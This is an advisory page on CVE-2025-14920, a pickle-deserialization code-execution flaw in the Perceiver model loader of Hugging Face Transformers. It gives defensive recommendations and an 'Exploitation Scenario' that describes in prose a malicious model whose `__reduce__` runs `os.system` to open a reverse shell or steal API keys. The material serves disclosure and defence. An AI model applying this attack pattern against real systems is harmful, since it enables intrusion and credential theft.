CVE-2025-14920

UNKNOWN
Published December 23, 2025
CISO Take

CVE-2025-14920 is a deserialization RCE in Hugging Face Transformers' Perceiver model loader — an attacker can achieve full code execution on any system that loads a malicious model file. Organizations pulling models from HuggingFace Hub, shared drives, or external sources are directly exposed. Immediate action: audit where Transformers is deployed, restrict model loading to verified/signed sources, and patch or pin to a fixed version once available.

Affected Systems

Package Ecosystem Vulnerable Range Patched
transformers pip No patch

Do you use transformers? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
KEV Status
Not in KEV
Sophistication
Moderate

Recommended Action

  1. 1. PATCH: Monitor HuggingFace Transformers releases for a fix targeting the Perceiver model file parser; pin to patched version immediately. 2. INVENTORY: Identify all environments with `transformers` installed that load Perceiver models (`grep -r 'Perceiver' --include='*.py'`). 3. RESTRICT MODEL SOURCES: Enforce allowlisting — only load models from internal artifact registries with SHA-256 hash verification. Reject models from arbitrary URLs or unverified Hub accounts. 4. SANDBOX: Run model loading in isolated environments (separate containers/VMs with no network egress) and inspect model files with tools like `fickling` before loading in production. 5. DETECT: Alert on unexpected network connections or child process spawns from Python ML processes. 6. WORKAROUND: If Perceiver models are not in use, block their loading at the framework level or remove the model class from the import path. 7. REVIEW: Audit recent downloads of Perceiver model files from public registries for tampering.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity Article 17 - Quality management system Article 9 - Risk management system
ISO 42001
A.10.1 - AI system supply chain security A.6.1.3 - AI supply chain security A.8.4 - AI system technical security
NIST AI RMF
GOVERN-6.1 - AI supply chain risk management GV-1.6 - Organizational risk tolerance MANAGE-2.2 - Mechanisms to respond to AI risks MS-2.5 - Practices and personnel for AI risk management
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities LLM05 - Supply Chain Vulnerabilities

Technical Details

NVD Description

Hugging Face Transformers Perceiver Model Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of model files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-25423.

Exploitation Scenario

An adversary crafts a malicious Perceiver model file containing a serialized Python object that executes arbitrary commands upon deserialization (classic pickle exploit pattern: `__reduce__` returning `os.system` or `subprocess`). The attacker uploads this model to HuggingFace Hub under a plausible name (e.g., 'perceiver-base-finetuned-images-v2'). A data scientist or automated pipeline calls `PerceiverModel.from_pretrained('attacker/perceiver-base-finetuned-images-v2')`, the Transformers library deserializes the model file without validation, and the payload executes — establishing a reverse shell, exfiltrating API keys from environment variables, or pivoting to internal infrastructure. In CI/CD contexts where models are pulled during training jobs, this achieves server-side RCE with no further attacker interaction.

Weaknesses (CWE)

Timeline

Published
December 23, 2025
Last Modified
January 21, 2026
First Seen
December 23, 2025